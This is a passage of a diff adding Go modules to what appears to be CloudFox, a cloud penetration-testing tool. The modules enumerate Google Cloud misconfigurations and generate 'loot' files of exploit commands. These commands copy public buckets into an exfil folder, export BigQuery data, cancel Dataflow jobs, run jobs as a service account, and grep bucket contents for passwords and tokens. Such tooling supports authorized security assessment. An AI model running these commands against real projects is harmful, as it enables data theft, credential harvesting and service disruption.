fmt.Sprintf( + "# Create instance from public image\n"+ + "gcloud compute instances create exfil-vm --image=projects/%s/global/images/%s --zone=us-central1-a", + projectID, image.Name), + } + + m.mu.Lock() + m.ProjectPublicExports[projectID] = append(m.ProjectPublicExports[projectID], export) + m.ProjectExfiltrationPaths[projectID] = append(m.ProjectExfiltrationPaths[projectID], path) + m.addExfiltrationPathToLoot(projectID, path) + m.mu.Unlock() + } + } + return nil + }) + + if err != nil { + gcpinternal.HandleGCPError(err, logger, GCP_DATAEXFILTRATION_MODULE_NAME, + fmt.Sprintf("Could not list images in project %s", projectID)) + } +} + +// findPublicBuckets finds GCS buckets with public access +func (m *DataExfiltrationModule) findPublicBuckets(ctx context.Context, projectID string, logger internal.Logger) { + storageService, err := storage.NewService(ctx) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_DATAEXFILTRATION_MODULE_NAME, + fmt.Sprintf("Could not create Storage service in project %s", projectID)) + return + } + + resp, err := storageService.Buckets.List(projectID).Do() + if err != nil { + gcpinternal.HandleGCPError(err, logger, GCP_DATAEXFILTRATION_MODULE_NAME, + fmt.Sprintf("Could not list buckets in project %s", projectID)) + return + } + + for _, bucket := range resp.Items { + policy, err := storageService.Buckets.GetIamPolicy(bucket.Name).Do() + if err != nil { + continue + } + + accessLevel := "" + for _, binding := range policy.Bindings { + for _, member := range binding.Members { + if shared.IsPublicPrincipal(member) { + if member == "allUsers" { + accessLevel = "allUsers" + break + } + if accessLevel != "allUsers" { + accessLevel = "allAuthenticatedUsers" + } + } + } + } + + if accessLevel != "" { + export := PublicExport{ + ResourceType: "Storage Bucket", + ResourceName: bucket.Name, + ProjectID: projectID, + AccessLevel: accessLevel, + DataType: "gcs_bucket", + RiskLevel: "CRITICAL", + } + + path := ExfiltrationPath{ + PathType: "Public Bucket", + ResourceName: bucket.Name, + ProjectID: projectID, + Description: fmt.Sprintf("GCS bucket accessible to %s", accessLevel), + Destination: "Anyone with access level: " + accessLevel, + RiskLevel: "CRITICAL", + RiskReasons: []string{"Bucket is publicly accessible", "May contain sensitive files"}, + ExploitCommand: fmt.Sprintf( + "# List public bucket contents\n"+ + "gsutil ls -r gs://%s/\n"+ + "# Download all files\n"+ + "gsutil -m cp -r gs://%s/ ./exfil/", + bucket.Name, bucket.Name), + } + + m.mu.Lock() + m.ProjectPublicExports[projectID] = append(m.ProjectPublicExports[projectID], export) + m.ProjectExfiltrationPaths[projectID] = append(m.ProjectExfiltrationPaths[projectID], path) + m.addExfiltrationPathToLoot(projectID, path) + m.mu.Unlock() + } + } +} + +// findCrossProjectLoggingSinks finds logging sinks that export to external destinations +func (m *DataExfiltrationModule) findCrossProjectLoggingSinks(ctx context.Context, projectID string, logger internal.Logger) { + ls := loggingservice.New() + sinks, err := ls.Sinks(projectID) + if err != nil { + gcpinternal.HandleGCPError(err, logger, GCP_DATAEXFILTRATION_MODULE_NAME, + fmt.Sprintf("Could not list logging sinks in project %s", projectID)) + return + } + + for _, sink := range sinks { + if sink.Disabled { + continue + } + + if sink.IsCrossProject { + riskLevel := "HIGH" + if sink.DestinationType == "pubsub" { + riskLevel = "MEDIUM" + } + + destDesc := fmt.Sprintf("%s in project %s", sink.DestinationType, sink.DestinationProject) + + path := ExfiltrationPath{ + PathType: "Logging Sink", + ResourceName: sink.Name, + ProjectID: projectID, + Description: fmt.Sprintf("Logs exported to %s", destDesc), + Destination: sink.Destination, + RiskLevel: riskLevel, + RiskReasons: []string{"Logs exported to different project", "May contain sensitive information in log entries"}, + ExploitCommand: fmt.Sprintf( + "# View sink configuration\n"+ + "gcloud logging sinks describe %s --project=%s\n"+ + "# Check destination permissions\n"+ + "# Destination: %s", + sink.Name, projectID, sink.Destination), + } + + m.mu.Lock() + m.ProjectExfiltrationPaths[projectID] = append(m.ProjectExfiltrationPaths[projectID], path) + m.addExfiltrationPathToLoot(projectID, path) + m.mu.Unlock() + } + } +} + +// findPubSubPushEndpoints finds Pub/Sub subscriptions pushing to external HTTP endpoints +func (m *DataExfiltrationModule) findPubSubPushEndpoints(ctx context.Context, projectID string, logger internal.Logger) { + ps := pubsubservice.New() + subs, err := ps.Subscriptions(projectID) + if err != nil { + gcpinternal.HandleGCPError(err, logger, GCP_DATAEXFILTRATION_MODULE_NAME, + fmt.Sprintf("Could not list Pub/Sub subscriptions in project %s", projectID)) + return + } + + for _, sub := range subs { + if sub.PushEndpoint == "" { + continue + } + + endpoint := sub.PushEndpoint + isExternal := true + if strings.Contains(endpoint, ".run.app") || + strings.Contains(endpoint, ".cloudfunctions.net") || + strings.Contains(endpoint, "appspot.com") || + strings.Contains(endpoint, "googleapis.com") { + isExternal = false + } + + if isExternal { + riskLevel := "HIGH" + + path := ExfiltrationPath{ + PathType: "Pub/Sub Push", + ResourceName: sub.Name, + ProjectID: projectID, + Description: "Subscription pushes messages to external endpoint", + Destination: endpoint, + RiskLevel: riskLevel, + RiskReasons: []string{"Messages pushed to external HTTP endpoint", "Endpoint may be attacker-controlled"}, + ExploitCommand: fmt.Sprintf( + "# View subscription configuration\n"+ + "gcloud pubsub subscriptions describe %s --project=%s\n"+ + "# Test endpoint\n"+ + "curl -v %s", + sub.Name, projectID, endpoint), + } + + m.mu.Lock() + m.ProjectExfiltrationPaths[projectID] = append(m.ProjectExfiltrationPaths[projectID], path) + m.addExfiltrationPathToLoot(projectID, path) + m.mu.Unlock() + } + } +} + +// findPubSubExportSubscriptions finds Pub/Sub subscriptions exporting to BigQuery or GCS +func (m *DataExfiltrationModule) findPubSubExportSubscriptions(ctx context.Context, projectID string, logger internal.Logger) { + ps := pubsubservice.New() + subs, err := ps.Subscriptions(projectID) + if err != nil { + return + } + + for _, sub := range subs { + if sub.BigQueryTable != "" { + parts := strings.Split(sub.BigQueryTable, ".") + if len(parts) >= 1 { + destProject := parts[0] + if destProject != projectID { + path := ExfiltrationPath{ + PathType: "Pub/Sub BigQuery Export", + ResourceName: sub.Name, + ProjectID: projectID, + Description: "Subscription exports messages to BigQuery in different project", + Destination: sub.BigQueryTable, + RiskLevel: "MEDIUM", + RiskReasons: []string{"Messages exported to different project", "Data flows outside source project"}, + ExploitCommand: fmt.Sprintf( + "gcloud pubsub subscriptions describe %s --project=%s", + sub.Name, projectID), + } + + m.mu.Lock() + m.ProjectExfiltrationPaths[projectID] = append(m.ProjectExfiltrationPaths[projectID], path) + m.addExfiltrationPathToLoot(projectID, path) + m.mu.Unlock() + } + } + } + + if sub.CloudStorageBucket != "" { + path := ExfiltrationPath{ + PathType: "Pub/Sub GCS Export", + ResourceName: sub.Name, + ProjectID: projectID, + Description: "Subscription exports messages to Cloud Storage bucket", + Destination: "gs://" + sub.CloudStorageBucket, + RiskLevel: "MEDIUM", + RiskReasons: []string{"Messages exported to Cloud Storage", "Bucket may be accessible externally"}, + ExploitCommand: fmt.Sprintf( + "gcloud pubsub subscriptions describe %s --project=%s\n"+ + "gsutil ls gs://%s/", + sub.Name, projectID, sub.CloudStorageBucket), + } + + m.mu.Lock() + m.ProjectExfiltrationPaths[projectID] = append(m.ProjectExfiltrationPaths[projectID], path) + m.addExfiltrationPathToLoot(projectID, path) + m.mu.Unlock() + } + } +} + +// findPublicBigQueryDatasets finds BigQuery datasets with public IAM bindings +func (m *DataExfiltrationModule) findPublicBigQueryDatasets(ctx context.Context, projectID string, logger internal.Logger) { + bq := bigqueryservice.New() + datasets, err := bq.BigqueryDatasets(projectID) + if err != nil { + gcpinternal.HandleGCPError(err, logger, GCP_DATAEXFILTRATION_MODULE_NAME, + fmt.Sprintf("Could not list BigQuery datasets in project %s", projectID)) + return + } + + for _, dataset := range datasets { + if dataset.IsPublic { + export := PublicExport{ + ResourceType: "BigQuery Dataset", + ResourceName: dataset.DatasetID, + ProjectID: projectID, + AccessLevel: dataset.PublicAccess, + DataType: "bigquery_dataset", + RiskLevel: "CRITICAL", + } + + path := ExfiltrationPath{ + PathType: "Public BigQuery", + ResourceName: dataset.DatasetID, + ProjectID: projectID, + Description: fmt.Sprintf("BigQuery dataset accessible to %s", dataset.PublicAccess), + Destination: "Anyone with access level: " + dataset.PublicAccess, + RiskLevel: "CRITICAL", + RiskReasons: []string{"Dataset is publicly accessible", "Data can be queried by anyone"}, + ExploitCommand: fmt.Sprintf( + "# Query public dataset\n"+ + "bq query --use_legacy_sql=false 'SELECT * FROM `%s.%s.INFORMATION_SCHEMA.TABLES`'\n"+ + "# Export data\n"+ + "bq extract --destination_format=CSV '%s.%s.TABLE_NAME' gs://your-bucket/export.csv", + projectID, dataset.DatasetID, projectID, dataset.DatasetID), + } + + m.mu.Lock() + m.ProjectPublicExports[projectID] = append(m.ProjectPublicExports[projectID], export) + m.ProjectExfiltrationPaths[projectID] = append(m.ProjectExfiltrationPaths[projectID], path) + m.addExfiltrationPathToLoot(projectID, path) + m.mu.Unlock() + } + } +} + +// findCloudSQLExportConfig finds Cloud SQL instances with export configurations +func (m *DataExfiltrationModule) findCloudSQLExportConfig(ctx context.Context, projectID string, logger internal.Logger) { + sqlService, err := sqladmin.NewService(ctx) + if err != nil { + return + } + + resp, err := sqlService.Instances.List(projectID).Do() + if err != nil { + gcpinternal.HandleGCPError(err, logger, GCP_DATAEXFILTRATION_MODULE_NAME, + fmt.Sprintf("Could not list Cloud SQL instances in project %s", projectID)) + return + } + + for _, instance := range resp.Items { + if instance.Settings != nil && instance.Settings.BackupConfiguration != nil { + backup := instance.Settings.BackupConfiguration + if backup.Enabled && backup.BinaryLogEnabled { + path := ExfiltrationPath{ + PathType: "Cloud SQL Export", + ResourceName: instance.Name, + ProjectID: projectID, + Description: "Cloud SQL instance with binary logging enabled (enables CDC export)", + Destination: "External via mysqldump/pg_dump or CDC", + RiskLevel: "LOW", + RiskReasons: []string{"Binary logging enables change data capture", "Data can be exported if IAM allows"}, + ExploitCommand: fmt.Sprintf( + "# Check export permissions\n"+ + "gcloud sql instances describe %s --project=%s\n"+ + "# Export if permitted\n"+ + "gcloud sql export sql %s gs://bucket/export.sql --database=mydb", + instance.Name, projectID, instance.Name), + } + + m.mu.Lock() + m.ProjectExfiltrationPaths[projectID] = append(m.ProjectExfiltrationPaths[projectID], path) + m.addExfiltrationPathToLoot(projectID, path) + m.mu.Unlock() + } + } + } +} + +// findStorageTransferJobs finds Storage Transfer Service jobs to external destinations +func (m *DataExfiltrationModule) findStorageTransferJobs(ctx context.Context, projectID string, logger internal.Logger) { + stsService, err := storagetransfer.NewService(ctx) + if err != nil { + return + } + + filter := fmt.Sprintf(`{"projectId":"%s"}`, projectID) + req := stsService.TransferJobs.List(filter) + err = req.Pages(ctx, func(page *storagetransfer.ListTransferJobsResponse) error { + for _, job := range page.TransferJobs { + if job.Status != "ENABLED" { + continue + } + + var destination string + var destType string + var isExternal bool + + if job.TransferSpec != nil { + if job.TransferSpec.AwsS3DataSource != nil { + destination = fmt.Sprintf("s3://%s", job.TransferSpec.AwsS3DataSource.BucketName) + destType = "AWS S3" + isExternal = true + } + if job.TransferSpec.AzureBlobStorageDataSource != nil { + destination = fmt.Sprintf("azure://%s/%s", + job.TransferSpec.AzureBlobStorageDataSource.StorageAccount, + job.TransferSpec.AzureBlobStorageDataSource.Container) + destType = "Azure Blob" + isExternal = true + } + if job.TransferSpec.HttpDataSource != nil { + destination = job.TransferSpec.HttpDataSource.ListUrl + destType = "HTTP" + isExternal = true + } + } + + if isExternal { + path := ExfiltrationPath{ + PathType: "Storage Transfer", + ResourceName: job.Name, + ProjectID: projectID, + Description: fmt.Sprintf("Transfer job to %s", destType), + Destination: destination, + RiskLevel: "HIGH", + RiskReasons: []string{"Data transferred to external cloud provider", "Destination outside GCP control"}, + ExploitCommand: fmt.Sprintf( + "# View transfer job\n"+ + "gcloud transfer jobs describe %s", + job.Name), + } + + m.mu.Lock() + m.ProjectExfiltrationPaths[projectID] = append(m.ProjectExfiltrationPaths[projectID], path) + m.addExfiltrationPathToLoot(projectID, path) + m.mu.Unlock() + } + } + return nil + }) + + if err != nil { + gcpinternal.HandleGCPError(err, logger, GCP_DATAEXFILTRATION_MODULE_NAME, + fmt.Sprintf("Could not list Storage Transfer jobs for project %s", projectID)) + } +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *DataExfiltrationModule) addExfiltrationPathToLoot(projectID string, path ExfiltrationPath) { + if path.ExploitCommand == "" { + return + } + + lootFile := m.LootMap[projectID]["data-exfiltration-commands"] + if lootFile == nil { + return + } + + lootFile.Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# [ACTUAL] %s: %s\n"+ + "# =============================================================================\n"+ + "# Project: %s\n"+ + "# Description: %s\n"+ + "# Destination: %s\n", + path.PathType, + path.ResourceName, + path.ProjectID, + path.Description, + path.Destination, + ) + + lootFile.Contents += fmt.Sprintf("%s\n\n", path.ExploitCommand) +} + +// ------------------------------ +// Output Generation +// ------------------------------ + +func (m *DataExfiltrationModule) writeOutput(ctx context.Context, logger internal.Logger) { + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +func (m *DataExfiltrationModule) getMisconfigHeader() []string { + return []string{ + "Project", + "Resource", + "Type", + "Destination", + "Public", + "Size", + } +} + +func (m *DataExfiltrationModule) getFoxMapperHeader() []string { + return []string{ + "Scope Type", + "Scope ID", + "Principal Type", + "Principal", + "Service", + "Permission", + "Description", + } +} + +func (m *DataExfiltrationModule) pathsToTableBody(paths []ExfiltrationPath, exports []PublicExport) [][]string { + var body [][]string + + publicResources := make(map[string]PublicExport) + for _, e := range exports { + key := fmt.Sprintf("%s:%s:%s", e.ProjectID, e.ResourceType, e.ResourceName) + publicResources[key] = e + } + + for _, p := range paths { + key := fmt.Sprintf("%s:%s:%s", p.ProjectID, p.PathType, p.ResourceName) + export, isPublic := publicResources[key] + + publicStatus := "No" + size := "-" + if isPublic { + publicStatus = "Yes" + size = export.Size + delete(publicResources, key) + } + + body = append(body, []string{ + m.GetProjectName(p.ProjectID), + p.ResourceName, + p.PathType, + p.Destination, + publicStatus, + size, + }) + } + + for _, e := range publicResources { + body = append(body, []string{ + m.GetProjectName(e.ProjectID), + e.ResourceName, + e.ResourceType, + "Public access: " + e.AccessLevel, + "Yes", + e.Size, + }) + } + + return body +} + +// foxMapperFindingsForProject returns findings for a specific project +// Includes: SAs from that project + users/groups (which can access any project) +// Also filters by scope: only org/folder/project findings in the project's hierarchy +func (m *DataExfiltrationModule) foxMapperFindingsForProject(projectID string) [][]string { + var body [][]string + + // Get ancestor folders and org for filtering + var ancestorFolders []string + var projectOrgID string + if m.OrgCache != nil && m.OrgCache.IsPopulated() { + ancestorFolders = m.OrgCache.GetProjectAncestorFolders(projectID) + projectOrgID = m.OrgCache.GetProjectOrgID(projectID) + } + ancestorFolderSet := make(map[string]bool) + for _, f := range ancestorFolders { + ancestorFolderSet[f] = true + } + + for _, f := range m.FoxMapperFindings { + for _, p := range f.Principals { + principalProject := extractProjectFromPrincipal(p.Principal, m.OrgCache) + + // Include if: SA from this project OR user/group (no project - applies to all) + if principalProject != projectID && principalProject != "" { + continue + } + + // Filter by scope hierarchy + if !m.scopeMatchesProject(p.ScopeType, p.ScopeID, projectID, projectOrgID, ancestorFolderSet) { + continue + } + + // Determine principal type + principalType := p.MemberType + if principalType == "" { + if p.IsServiceAccount { + principalType = "serviceAccount" + } else { + principalType = "user" + } + } + + scopeType := p.ScopeType + if scopeType == "" { + scopeType = "-" + } + scopeID := p.ScopeID + if scopeID == "" { + scopeID = "-" + } + + body = append(body, []string{ + scopeType, + scopeID, + principalType, + p.Principal, + f.Service, + f.Permission, + f.Description, + }) + } + } + return body +} + +// foxMapperFindingsWithoutProject returns findings for principals without a clear project +// (e.g., compute default SAs, users, groups) +func (m *DataExfiltrationModule) foxMapperFindingsWithoutProject() [][]string { + var body [][]string + for _, f := range m.FoxMapperFindings { + for _, p := range f.Principals { + // Extract project from principal + principalProject := extractProjectFromPrincipal(p.Principal, m.OrgCache) + + // Only include if we couldn't determine the project + if principalProject != "" { + continue + } + + // Determine principal type + principalType := p.MemberType + if principalType == "" { + if p.IsServiceAccount { + principalType = "serviceAccount" + } else { + principalType = "user" + } + } + + scopeType := p.ScopeType + if scopeType == "" { + scopeType = "-" + } + scopeID := p.ScopeID + if scopeID == "" { + scopeID = "-" + } + + body = append(body, []string{ + scopeType, + scopeID, + principalType, + p.Principal, + f.Service, + f.Permission, + f.Description, + }) + } + } + return body +} + +// foxMapperFindingsToTableBodyForProject returns findings filtered by project +func (m *DataExfiltrationModule) foxMapperFindingsToTableBodyForProject(projectID string) [][]string { + var body [][]string + for _, f := range m.FoxMapperFindings { + for _, p := range f.Principals { + // Extract project from principal (uses existing function from privesc.go) + principalProject := extractProjectFromPrincipal(p.Principal, m.OrgCache) + + // Only include if it matches this project + if principalProject != projectID { + continue + } + + // Determine principal type + principalType := p.MemberType + if principalType == "" { + if p.IsServiceAccount { + principalType = "serviceAccount" + } else { + principalType = "user" + } + } + + scopeType := p.ScopeType + if scopeType == "" { + scopeType = "-" + } + + body = append(body, []string{ + scopeType, + principalProject, + principalType, + p.Principal, + f.Service, + f.Permission, + f.Description, + }) + } + } + return body +} + +// foxMapperFindingsToTableBody returns all findings (for flat output) +func (m *DataExfiltrationModule) foxMapperFindingsToTableBody() [][]string { + var body [][]string + for _, f := range m.FoxMapperFindings { + for _, p := range f.Principals { + // Determine principal type + principalType := p.MemberType + if principalType == "" { + if p.IsServiceAccount { + principalType = "serviceAccount" + } else { + principalType = "user" + } + } + + scopeType := p.ScopeType + if scopeType == "" { + scopeType = "-" + } + scopeID := p.ScopeID + if scopeID == "" { + scopeID = "-" + } + + body = append(body, []string{ + scopeType, + scopeID, + principalType, + p.Principal, + f.Service, + f.Permission, + f.Description, + }) + } + } + return body +} + +// scopeMatchesProject checks if a scope (org/folder/project) is in the hierarchy for a project +func (m *DataExfiltrationModule) scopeMatchesProject(scopeType, scopeID, projectID, projectOrgID string, ancestorFolderSet map[string]bool) bool { + if scopeType == "" || scopeID == "" { + // No scope info - include by default + return true + } + + switch scopeType { + case "project": + return scopeID == projectID + case "organization": + if projectOrgID != "" { + return scopeID == projectOrgID + } + // No org info - include by default + return true + case "folder": + if len(ancestorFolderSet) > 0 { + return ancestorFolderSet[scopeID] + } + // No folder info - include by default + return true + case "resource": + // Resource-level - include by default + return true + default: + return true + } +} + +func (m *DataExfiltrationModule) buildTablesForProject(projectID string) []internal.TableFile { + var tableFiles []internal.TableFile + + paths := m.ProjectExfiltrationPaths[projectID] + exports := m.ProjectPublicExports[projectID] + + if len(paths) > 0 || len(exports) > 0 { + body := m.pathsToTableBody(paths, exports) + if len(body) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "data-exfiltration-misconfigurations", + Header: m.getMisconfigHeader(), + Body: body, + }) + } + } + + return tableFiles +} + +func (m *DataExfiltrationModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + FolderLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + // Process each specified project (via -p or -l flags) + for _, projectID := range m.ProjectIDs { + m.initializeLootForProject(projectID) + + tableFiles := m.buildTablesForProject(projectID) + + // Add FoxMapper findings table for this project + // Include SAs from this project + users/groups (which apply to all projects) + foxMapperBody := m.foxMapperFindingsForProject(projectID) + if len(foxMapperBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "data-exfiltration-permissions", + Header: m.getFoxMapperHeader(), + Body: foxMapperBody, + }) + } + + // Add loot files for this project + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + // Add project-specific playbook + playbook := m.generatePlaybookForProject(projectID) + if playbook != nil && playbook.Contents != "" { + lootFiles = append(lootFiles, *playbook) + } + + // Always add all specified projects to output + outputData.ProjectLevelData[projectID] = DataExfiltrationOutput{Table: tableFiles, Loot: lootFiles} + } + + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), GCP_DATAEXFILTRATION_MODULE_NAME) + } +} + +func (m *DataExfiltrationModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + allPaths := m.getAllExfiltrationPaths() + allExports := m.getAllPublicExports() + + for _, projectID := range m.ProjectIDs { + m.initializeLootForProject(projectID) + } + + tables := []internal.TableFile{} + + misconfigBody := m.pathsToTableBody(allPaths, allExports) + if len(misconfigBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "data-exfiltration-misconfigurations", + Header: m.getMisconfigHeader(), + Body: misconfigBody, + }) + } + + if len(m.FoxMapperFindings) > 0 { + tables = append(tables, internal.TableFile{ + Name: "data-exfiltration-permissions", + Header: m.getFoxMapperHeader(), + Body: m.foxMapperFindingsToTableBody(), + }) + } + + var lootFiles []internal.LootFile + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + // For flat output, generate a combined playbook for all projects + for _, projectID := range m.ProjectIDs { + playbook := m.generatePlaybookForProject(projectID) + if playbook != nil && playbook.Contents != "" { + // Rename to include project + playbook.Name = fmt.Sprintf("data-exfiltration-commands-%s", projectID) + lootFiles = append(lootFiles, *playbook) + } + } + + output := DataExfiltrationOutput{ + Table: tables, + Loot: lootFiles, + } + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, projectID := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(projectID) + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), GCP_DATAEXFILTRATION_MODULE_NAME) + m.CommandCounter.Error++ + } +} diff --git a/gcp/commands/dataflow.go b/gcp/commands/dataflow.go new file mode 100644 index 00000000..a2a5c31b --- /dev/null +++ b/gcp/commands/dataflow.go @@ -0,0 +1,336 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + dataflowservice "github.com/BishopFox/cloudfox/gcp/services/dataflowService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPDataflowCommand = &cobra.Command{ + Use: globals.GCP_DATAFLOW_MODULE_NAME, + Aliases: []string{"df", "pipelines"}, + Short: "Enumerate Dataflow jobs and pipelines", + Long: `Enumerate Dataflow jobs with security analysis. + +Features: +- Lists all Dataflow jobs (batch and streaming) +- Shows service account configuration +- Identifies network exposure (public IPs) +- Analyzes temp/staging storage locations +- Detects default service account usage`, + Run: runGCPDataflowCommand, +} + +type DataflowModule struct { + gcpinternal.BaseGCPModule + ProjectJobs map[string][]dataflowservice.JobInfo // projectID -> jobs + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + FoxMapperCache *gcpinternal.FoxMapperCache // Cached FoxMapper analysis results + mu sync.Mutex +} + +type DataflowOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o DataflowOutput) TableFiles() []internal.TableFile { return o.Table } +func (o DataflowOutput) LootFiles() []internal.LootFile { return o.Loot } + +func runGCPDataflowCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_DATAFLOW_MODULE_NAME) + if err != nil { + return + } + + module := &DataflowModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectJobs: make(map[string][]dataflowservice.JobInfo), + LootMap: make(map[string]map[string]*internal.LootFile), + } + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +func (m *DataflowModule) Execute(ctx context.Context, logger internal.Logger) { + // Get FoxMapper cache from context + m.FoxMapperCache = gcpinternal.GetFoxMapperCacheFromContext(ctx) + + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_DATAFLOW_MODULE_NAME, m.processProject) + + allJobs := m.getAllJobs() + if len(allJobs) == 0 { + logger.InfoM("No Dataflow jobs found", globals.GCP_DATAFLOW_MODULE_NAME) + return + } + + // Count by state + running := 0 + publicIPs := 0 + for _, job := range allJobs { + if job.State == "JOB_STATE_RUNNING" { + running++ + } + if job.UsePublicIPs { + publicIPs++ + } + } + + logger.SuccessM(fmt.Sprintf("Found %d Dataflow job(s) (%d running, %d with public IPs)", + len(allJobs), running, publicIPs), globals.GCP_DATAFLOW_MODULE_NAME) + m.writeOutput(ctx, logger) +} + +func (m *DataflowModule) getAllJobs() []dataflowservice.JobInfo { + var all []dataflowservice.JobInfo + for _, jobs := range m.ProjectJobs { + all = append(all, jobs...) + } + return all +} + +func (m *DataflowModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating Dataflow in project: %s", projectID), globals.GCP_DATAFLOW_MODULE_NAME) + } + + svc := dataflowservice.New() + jobs, err := svc.ListJobs(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_DATAFLOW_MODULE_NAME, + fmt.Sprintf("Could not list Dataflow jobs in project %s", projectID)) + return + } + + m.mu.Lock() + m.ProjectJobs[projectID] = jobs + + // Initialize loot for this project + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["dataflow-commands"] = &internal.LootFile{ + Name: "dataflow-commands", + Contents: "# Dataflow Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + } + + for _, job := range jobs { + m.addToLoot(projectID, job) + } + m.mu.Unlock() +} + +func (m *DataflowModule) addToLoot(projectID string, job dataflowservice.JobInfo) { + lootFile := m.LootMap[projectID]["dataflow-commands"] + if lootFile == nil { + return + } + lootFile.Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# DATAFLOW JOB: %s\n"+ + "# =============================================================================\n"+ + "# Project: %s\n"+ + "# Location: %s\n"+ + "# ID: %s\n"+ + "# Type: %s\n"+ + "# State: %s\n"+ + "# Service Account: %s\n"+ + "# Public IPs: %v\n"+ + "# Workers: %d\n", + job.Name, job.ProjectID, job.Location, + job.ID, job.Type, job.State, + job.ServiceAccount, job.UsePublicIPs, job.NumWorkers, + ) + + lootFile.Contents += fmt.Sprintf(` +# === ENUMERATION COMMANDS === + +# Describe job: +gcloud dataflow jobs describe %s --project=%s --region=%s + +# Show job details: +gcloud dataflow jobs show %s --project=%s --region=%s + +# List all Dataflow jobs: +gcloud dataflow jobs list --project=%s --region=%s + +# Get job metrics: +gcloud dataflow metrics list %s --project=%s --region=%s + +`, + job.ID, job.ProjectID, job.Location, + job.ID, job.ProjectID, job.Location, + job.ProjectID, job.Location, + job.ID, job.ProjectID, job.Location, + ) + + // Bucket inspection + if job.TempLocation != "" { + lootFile.Contents += fmt.Sprintf( + "# Inspect temp bucket (may contain intermediate data):\n"+ + "gsutil ls -r %s\n\n", + job.TempLocation, + ) + } + if job.StagingLocation != "" { + lootFile.Contents += fmt.Sprintf( + "# Inspect staging bucket (contains job artifacts):\n"+ + "gsutil ls -r %s\n\n", + job.StagingLocation, + ) + } + + // === EXPLOIT COMMANDS === + lootFile.Contents += "# === EXPLOIT COMMANDS ===\n\n" + + lootFile.Contents += fmt.Sprintf( + "# Cancel running job:\n"+ + "gcloud dataflow jobs cancel %s --project=%s --region=%s\n\n"+ + "# Drain running job (graceful stop):\n"+ + "gcloud dataflow jobs drain %s --project=%s --region=%s\n\n"+ + "# Submit a new Dataflow job (code execution as SA: %s):\n"+ + "# Template-based job:\n"+ + "gcloud dataflow jobs run cloudfox-test --gcs-location=gs://dataflow-templates/latest/Word_Count --region=%s --project=%s --parameters=inputFile=gs://BUCKET/input.txt,output=gs://BUCKET/output\n\n"+ + "# Flex template job (custom container = full code execution):\n"+ + "gcloud dataflow flex-template run cloudfox-flex --template-file-gcs-location=gs://YOUR_BUCKET/template.json --region=%s --project=%s --service-account-email=%s\n\n", + job.ID, job.ProjectID, job.Location, + job.ID, job.ProjectID, job.Location, + job.ServiceAccount, + job.Location, job.ProjectID, + job.Location, job.ProjectID, job.ServiceAccount, + ) + + // Inspect staging/temp for secrets + if job.TempLocation != "" || job.StagingLocation != "" { + lootFile.Contents += "# Search job buckets for secrets/credentials:\n" + if job.TempLocation != "" { + lootFile.Contents += fmt.Sprintf("gsutil cat %s/** 2>/dev/null | grep -iE '(password|secret|token|key|credential)'\n", job.TempLocation) + } + if job.StagingLocation != "" { + lootFile.Contents += fmt.Sprintf("gsutil cat %s/** 2>/dev/null | grep -iE '(password|secret|token|key|credential)'\n", job.StagingLocation) + } + lootFile.Contents += "\n" + } +} + +func (m *DataflowModule) writeOutput(ctx context.Context, logger internal.Logger) { + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +func (m *DataflowModule) getTableHeader() []string { + return []string{ + "Project ID", + "Project Name", + "Name", + "Type", + "State", + "Location", + "Service Account", + "SA Attack Paths", + "Public IPs", + "Workers", + } +} + +func (m *DataflowModule) 